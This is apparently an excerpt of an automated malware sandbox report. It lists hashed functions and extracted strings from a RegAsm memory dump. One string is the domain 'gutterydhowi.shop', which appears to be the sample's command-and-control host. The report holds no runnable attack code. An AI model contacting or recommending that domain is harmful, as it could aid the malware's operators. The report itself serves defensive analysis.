                                                                  • Opcode Fuzzy Hash: cc4438e265543dc60c17e4af3816322dfc04a26b990f0c8e12e52939bdc12f3d
                                                                  • Instruction Fuzzy Hash: 5812BCB5500B008FD725CF24D980B67B7F2AF86309F14892ED49A87B92E739F845CB59
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(0044EB80,00000000,00000001,0044EB70), ref: 00426FE9
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateInstance
                                                                  • String ID:
                                                                  • API String ID: 542301482-0
                                                                  • Opcode ID: 6b857c024720ac7b7e352e76ddfa4817e7e42bf3c285e39b0cfbbb18e45e5121
                                                                  • Instruction ID: 6c14e4c9a293253992b80aceda0b72b65ad673230c86ebd3f60838f3fce4d3ea
                                                                  • Opcode Fuzzy Hash: 6b857c024720ac7b7e352e76ddfa4817e7e42bf3c285e39b0cfbbb18e45e5121
                                                                  • Instruction Fuzzy Hash: DE61FEB03082209BDB209B24DC96B7733A4EF82358F144559F986CB390E379E809C76A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: "
                                                                  • API String ID: 0-123907689
                                                                  • Opcode ID: 3a375ffb791029574d5d487153f84a713dd1c5f8a93d4cec6e8116d322515391
                                                                  • Instruction ID: dac99c5dab73986a5260e87837a74846541daf9fe20671a14200a52273f6332c
                                                                  • Opcode Fuzzy Hash: 3a375ffb791029574d5d487153f84a713dd1c5f8a93d4cec6e8116d322515391
                                                                  • Instruction Fuzzy Hash: CCC159B2A043045BD7148F24C49176BB7E9AF89354F1C9A2FE895873A1D73CDC44C79A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: gutterydhowi.shop
                                                                  • API String ID: 0-3708922491
                                                                  • Opcode ID: 12b76bd1cddf45bbd6207310afd8c4b1868e0259217c3cf0ed6db9d5703ced3b
                                                                  • Instruction ID: cd89484c1d0e19e46c954de61e31bbebaec41b12b1ade970bd1187d44bb00fae
                                                                  • Opcode Fuzzy Hash: 12b76bd1cddf45bbd6207310afd8c4b1868e0259217c3cf0ed6db9d5703ced3b
                                                                  • Instruction Fuzzy Hash: B8C11574904256CFCB25CF68C8506BFB7B1FF46300F18497AE451AB792D339A85ACB98
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: P
                                                                  • API String ID: 0-3110715001
                                                                  • Opcode ID: 8839f7c265b375e9006fe6bdeca6ed09c35eeeec3042cf69133b77c92ed646e7
                                                                  • Instruction ID: dd4241a5a5a1caa29915f85dd6641d1f89e5dc2f7704d5486d9f392ef1a7eae6
                                                                  • Opcode Fuzzy Hash: 8839f7c265b375e9006fe6bdeca6ed09c35eeeec3042cf69133b77c92ed646e7
                                                                  • Instruction Fuzzy Hash: E9D104329082714FE725CE18989071FB6E1EB85718F168A3DE8B5AB381CB75DC06D7C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 2B
                                                                  • API String ID: 0-2489582833
                                                                  • Opcode ID: e7c9954c64a2a2e716abb4006260575443ff31ca00f66fa76071335e070d8145
                                                                  • Instruction ID: 1648f17e86a6f30225877104b632deb72bbb2998103f50de6865a7bf14004587
                                                                  • Opcode Fuzzy Hash: e7c9954c64a2a2e716abb4006260575443ff31ca00f66fa76071335e070d8145
                                                                  • Instruction Fuzzy Hash: 26A15731608391DFD3158F39EC5132A7BE2BF8A312F0986BDE491873A2D739DA458B05
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: drG$)FC$?*$2$CIBH${vry
                                                                  • API String ID: 0-1492907507
                                                                  • Opcode ID: bc606f07fc9a9b37c0bbc1281e8971c1ba7d3ec63685693cc84bf1c889e06ed2
                                                                  • Instruction ID: cd923c6c2a59a948de96ec4fde7e4145b598f3882073ecf6b485000af5a54b7d
                                                                  • Opcode Fuzzy Hash: bc606f07fc9a9b37c0bbc1281e8971c1ba7d3ec63685693cc84bf1c889e06ed2
                                                                  • Instruction Fuzzy Hash: 40B15C70404B818AE776CF39C490BE3BBE0AF5A304F44589ED4EA87792DB3AB445CB55
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: 4`[b
                                                                  • API String ID: 2994545307-3962175265
                                                                  • Opcode ID: af7cd8dfb4bab7b1b939c1d02885cf64ec67f89fa43523cb43bc70e1759908ab
                                                                  • Instruction ID: 65037cb4b131e6f69ae25d9d0f844069ac1afd20bdace3c3e68c66be08e3ab69
                                                                  • Opcode Fuzzy Hash: af7cd8dfb4bab7b1b939c1d02885cf64ec67f89fa43523cb43bc70e1759908ab
                                                                  • Instruction Fuzzy Hash: 3291C371608341ABF720DB15DC41B6FB7E6EB85354F54882EF98487352EB34E840DB9A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: gutterydhowi.shop
                                                                  • API String ID: 0-3708922491
                                                                  • Opcode ID: 6bc8c1bd5ce96e5f68242ff809a3884e59ac652b41232c3f29468b36261b81fa
                                                                  • Instruction ID: 70c147ec3628391604478acdee8e0d2f37a7db2c632e37ade1ef48e142da4b81
                                                                  • Opcode Fuzzy Hash: 6bc8c1bd5ce96e5f68242ff809a3884e59ac652b41232c3f29468b36261b81fa
                                                                  • Instruction Fuzzy Hash: 8E711075A142158BCB25CF68C8502BFB7B2BF9A301F18457AD841A77E2D3399809CB58
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 4`[b
                                                                  • API String ID: 0-3962175265
                                                                  • Opcode ID: a12ae3a26df7be4c76405ef57905c65d5fa8d4cf411352c140a33a637fd150d3
                                                                  • Instruction ID: c5202ddbdcec288203f215c2c9f34064d5f6e2a8da8471ef5e17f24a05bd36fb
                                                                  • Opcode Fuzzy Hash: a12ae3a26df7be4c76405ef57905c65d5fa8d4cf411352c140a33a637fd150d3
                                                                  • Instruction Fuzzy Hash: DB511371A09310ABEB159B189C90B3FB7E5EB89314F148A2DF8E5573E1CA35EC01C75A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: gutterydhowi.shop
                                                                  • API String ID: 0-3708922491
                                                                  • Opcode ID: 05d69a286e2430bbf8d7d29ed6800b71f8178752ddf9001bef238cf64567d83a
                                                                  • Instruction ID: 305a687461efa61535f20c4e30c50516a1adfbbcd579c48b290b171d3c892896
                                                                  • Opcode Fuzzy Hash: 05d69a286e2430bbf8d7d29ed6800b71f8178752ddf9001bef238cf64567d83a
                                                                  • Instruction Fuzzy Hash: BD413835A04210CFCB29CF28D8903BEB3B2FF5A311F18417AD801A7792D739A845C759
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @QB
                                                                  • API String ID: 0-3030980731
                                                                  • Opcode ID: fa7d8ae5b693dd60f6850cd017a17b0abae062ab4b2c1048713c2209d971f0dc
                                                                  • Instruction ID: 6d0cb73502d01e38b06274afbc8596ab77b17627c4c691baab7245b414bc2194
                                                                  • Opcode Fuzzy Hash: fa7d8ae5b693dd60f6850cd017a17b0abae062ab4b2c1048713c2209d971f0dc
                                                                  • Instruction Fuzzy Hash: C8219F74A093109BC310AB18D851A3BB7F5EF93755F848A1DE4D59B392E338CD10CBA6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: @
                                                                  • API String ID: 2994545307-2766056989
                                                                  • Opcode ID: 4e40ba8bf7269950f3de90b7a094009b82e9a869b5ebd9459ae0b40d5b25d8b7
                                                                  • Instruction ID: a91349f1e9a40293b62091c3c1e01b002cddce6e5b6639776973f8a2a5a102dc
                                                                  • Opcode Fuzzy Hash: 4e40ba8bf7269950f3de90b7a094009b82e9a869b5ebd9459ae0b40d5b25d8b7
                                                                  • Instruction Fuzzy Hash: 493156705093009BE714DF25D980A2BFBF9FF8A314F14892DF9C897252D339D9048BAA
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4631f2e57031adde87b200ba4790210232e1e318b6d81c4360bce7a359158444
                                                                  • Instruction ID: 956be2415fbe3cf17e3c2b9217a92116aac390c51ce612f86c4722e2567f76f6
                                                                  • Opcode Fuzzy Hash: 4631f2e57031adde87b200ba4790210232e1e318b6d81c4360bce7a359158444
                                                                  • Instruction Fuzzy Hash: BF42B331508315CBC725DF18E88026BB3E2FFD4314F258A3ED996A7385D739A951CB8A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4890b7e1405b60d2036cc250fc21e402b4f197dab0f25acee06565f4f699a01d
                                                                  • Instruction ID: e9f524300c54591016e612151c2e6d16e79c1b555d40a7684eed9594cd61b04f
                                                                  • Opcode Fuzzy Hash: 4890b7e1405b60d2036cc250fc21e402b4f197dab0f25acee06565f4f699a01d
                                                                  • Instruction Fuzzy Hash: 9152B331A0C3458FCB15CF24C0906AABBE1BF85314F19897EE89A67391D778E945CF86
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0a7a94d621f91307b6425b2df28a6db3f3defc87c09105d060c306e6a5a959a9
                                                                  • Instruction ID: 12bdd899994ea3f390c2677d5a8b46d1064a99c9932b785e2cc315b4497e3188
                                                                  • Opcode Fuzzy Hash: 0a7a94d621f91307b6425b2df28a6db3f3defc87c09105d060c306e6a5a959a9
                                                                  • Instruction Fuzzy Hash: EFB1BE31A09254DFD704DF28D99166EB7F1FB8A312F0A8829E889D7352D335ED20CB95
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bfd3633d6ed618898280b2bfa9fcdb0017dbfca5d3d0489a1ceccd4b7ddeeab4
                                                                  • Instruction ID: ba77fbe9a575c5c0e3916e552f8b9e900528f4925402827c04f08fa9a54957d4
                                                                  • Opcode Fuzzy Hash: bfd3633d6ed618898280b2bfa9fcdb0017dbfca5d3d0489a1ceccd4b7ddeeab4
                                                                  • Instruction Fuzzy Hash: 6FB1BA76A04316CFDB00CF64E8A466EB7B1FB4A302F194869D9019B362D3349854DB95
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4b39d16f317e8d19da953c30fd6ba31bcb37fca65e178eef6612cf70bcdbf204
                                                                  • Instruction ID: 777062db379b90a3490bb9d039b80cdec0e37db8c352507ae385cde0aeea2dbb
                                                                  • Opcode Fuzzy Hash: 4b39d16f317e8d19da953c30fd6ba31bcb37fca65e178eef6612cf70bcdbf204
                                                                  • Instruction Fuzzy Hash: 3AB159B4500B419FD3218F24CA80B67BBF5FF46705F04891DE8AA97A91E339F854CB69
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: e0dda43ae28496b58a7ef3ddbc7ecac972836593531f61fb537fa466d96248cf
                                                                  • Instruction ID: 71323470c014a4a126a73179cc5a1ef60c16c30d165a2ed76876cba0ed87e0d4
                                                                  • Opcode Fuzzy Hash: e0dda43ae28496b58a7ef3ddbc7ecac972836593531f61fb537fa466d96248cf
                                                                  • Instruction Fuzzy Hash: 0181C0706083019BE7109F68D880A2FB7E6FF95744F25882DE5C58B362D739EC54CB9A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 161dde24520697c1f0b729146d0885cd9b1b14967a11ed721bd29b2f76a8329d
                                                                  • Instruction ID: b5ff81ec9e9af75986a4fac7fb74df821215003c5149bce377154884bf3d8d24
                                                                  • Opcode Fuzzy Hash: 161dde24520697c1f0b729146d0885cd9b1b14967a11ed721bd29b2f76a8329d
                                                                  • Instruction Fuzzy Hash: B561E030608701ABEB10DF15D880B2BF7E6EB85314F24892EF59887362D739EC55CB5A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 15e8410b053a2cc03e8267f3a8188584c86f567d44663b6a5e23fecc97df7b06
                                                                  • Instruction ID: dc97e09a7f7da624c8807c98710862b4dce587ce3812b6c05e15904d13e63158
                                                                  • Opcode Fuzzy Hash: 15e8410b053a2cc03e8267f3a8188584c86f567d44663b6a5e23fecc97df7b06
                                                                  • Instruction Fuzzy Hash: 31518F716083409BE714DF29D880B2FB7E5EB85325F14892EF58497352C739E8148BAA
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ed095be0ec8c026400a107d1cab00e777ad572313e8e3e7afe1d6cba256e9fc0
                                                                  • Instruction ID: dec6aa83464d3b4264dd44e35dd919ff3509ff86f22b815f22340c26f882f573
                                                                  • Opcode Fuzzy Hash: ed095be0ec8c026400a107d1cab00e777ad572313e8e3e7afe1d6cba256e9fc0
                                                                  • Instruction Fuzzy Hash: 8951B3746092009BEB24DF55E980B2BB7E6EBC5305F18882EF4C587321D739DC10CB6A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b49a934ef247a52156d8ec0288b7fb744e74ccf73bfd21c8170fa558b5e02194
                                                                  • Instruction ID: a93e7bb16f79f5bee52f37b023afbee245ecc507bf95419d7e2d32b41e93770e
                                                                  • Opcode Fuzzy Hash: b49a934ef247a52156d8ec0288b7fb744e74ccf73bfd21c8170fa558b5e02194
                                                                  • Instruction Fuzzy Hash: 8E51A0B5A046009FC714DF14C480927B7A1FF89328F15467EE899AB392D635ED42CFDA
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c1f0316f3393f190ccd40142f6c8b68cc3853d850750d4fdd77fecf1086e8afb
                                                                  • Instruction ID: 67ff51331bc586e3258e30a007c696559b29967afb165d85162e472efda89275
                                                                  • Opcode Fuzzy Hash: c1f0316f3393f190ccd40142f6c8b68cc3853d850750d4fdd77fecf1086e8afb
                                                                  • Instruction Fuzzy Hash: AB41CF74208300ABE7149F24DD91B2FB7E6EB85755F24882DF58897352D339EC10CB9A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 302deb0443edf5660be99377dc82e965bc1882d97704a0ff0b743b8059469850
                                                                  • Instruction ID: 7bb1e064a9e3fe809587a2e583d5bbbc0ac817289a77bfc4f351f9a1e2f1ca79
                                                                  • Opcode Fuzzy Hash: 302deb0443edf5660be99377dc82e965bc1882d97704a0ff0b743b8059469850
                                                                  • Instruction Fuzzy Hash: F741AF34208300ABE7149F25ED94B2FB7E6FB85715F14886DF88957351D379E810CB9A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7e24e261311531be54728c1f7de490a8c5844de532af9053c9630d86519809ba
                                                                  • Instruction ID: 7a9764bf3efe6304778dabb77bcc631861f8f1a38c5e90041bb2cad766b257b8
                                                                  • Opcode Fuzzy Hash: 7e24e261311531be54728c1f7de490a8c5844de532af9053c9630d86519809ba
                                                                  • Instruction Fuzzy Hash: 11416A72505F418FC324CB29C491363B7E2AF59324F699A1EC4AA47B91E338F805CB59
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 57a6c332c5d3211bb44ff9af79ab587ffb2f10c5d39c5de35afcf0ad077f2112
                                                                  • Instruction ID: a376e7b36b3188e4cd9addea55493a65cc0f09d2769b96ef42937a54c16a89e2
                                                                  • Opcode Fuzzy Hash: 57a6c332c5d3211bb44ff9af79ab587ffb2f10c5d39c5de35afcf0ad077f2112
                                                                  • Instruction Fuzzy Hash: 02313EB4500B009BD735CF24C480AA3BBF5BB59300F154A2ED49787752E779F989CB99
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9f0085e10853b1e2969aa1028db42883cbeaeadcd86b2518a4c6ae1f0978dd0f
                                                                  • Instruction ID: a7d9893a673cfc8e199ffc65db64a738f37302f500c8e91188f8a16d540f37a9
                                                                  • Opcode Fuzzy Hash: 9f0085e10853b1e2969aa1028db42883cbeaeadcd86b2518a4c6ae1f0978dd0f
                                                                  • Instruction Fuzzy Hash: 9C210332D082104BC3249B59848152BF7E5EB9E704F16A62FED84973A5E3389C1887EA
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 609c9fe2b85b6fa7177e1b6ed724a188d16551f5cddb16224451ebaab9e6e429
                                                                  • Instruction ID: d5cb594caa8decbb0462b1d43e6d8ce9a9ace7f061841147579c4ba8b6174a16
                                                                  • Opcode Fuzzy Hash: 609c9fe2b85b6fa7177e1b6ed724a188d16551f5cddb16224451ebaab9e6e429
                                                                  • Instruction Fuzzy Hash: 5131BBB16042009BD7149F19D88092BB7E1EFC4319F14493EE999AB3D5D339EC42CB4A
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                  • Instruction ID: 5cf3d3f30d9613fe2714edcff59f0b0304f0c98455ce6f2d5f572e95ba5a2b3d
                                                                  • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                  • Instruction Fuzzy Hash: 10114C33A051D04EC31A8D7C844056ABFF30A97274F2D939AF4F5AB2D2D6278D8B8359
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aaac78c8cd68a7ef2a1be881b231878366a9c247148d4d2edc3e404ad033c8a4
                                                                  • Instruction ID: ed189d3e896a10b0522a78e84ad2b8f9b6df22bdec7557734b8ad8c6367bbd7f
                                                                  • Opcode Fuzzy Hash: aaac78c8cd68a7ef2a1be881b231878366a9c247148d4d2edc3e404ad033c8a4
                                                                  • Instruction Fuzzy Hash: 4E019EB160030187E7209F65E4E072BA2E86F98708F18273EE80957342DB79EC098299
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6741416765b83c74a1c2c5cba02842341f77218c3f9d8f562cc197a6a78b22bd
                                                                  • Instruction ID: de6e10c6ac35777bcd7977231f09f0839b9338373d8b97cfe4fbdb5b7db4e514
                                                                  • Opcode Fuzzy Hash: 6741416765b83c74a1c2c5cba02842341f77218c3f9d8f562cc197a6a78b22bd
                                                                  • Instruction Fuzzy Hash: 31F027B1A0819017DB218D449C80FB7BBADCB87228F190456EA8157202E1356C9083EE
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                  • Instruction ID: e276e2e20c09421a09e08c01a3586b5c7f2cd1a113514abf4008fb378859171c
                                                                  • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                  • Instruction Fuzzy Hash: D1D0A72160832146AB788E1AA500977F7F0EAC7B11FC9A55FF582E3248D634DC41C2BD
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.2264360236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: MetricsSystem
                                                                  • String ID:
                                                                  • API String ID: 4116985748-3916222277
                                                                  • Opcode ID: 7c882c57007ae2b99843c88eb0c07b372622de9aeed33002503f8c382e2d4657
                                                                  • Instruction ID: d31701c45078c7d4269a8adf496a0dfe1e86747451595843b7a2005472f7adb8
                                                                  • Opcode Fuzzy Hash: 7c882c57007ae2b99843c88eb0c07b372622de9aeed33002503f8c382e2d4657
                                                                  • Instruction Fuzzy Hash: 9A5180B4E142189FDB40EFACD985A9EBBF0BB48310F11852DE858E7350D734A949CF86
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
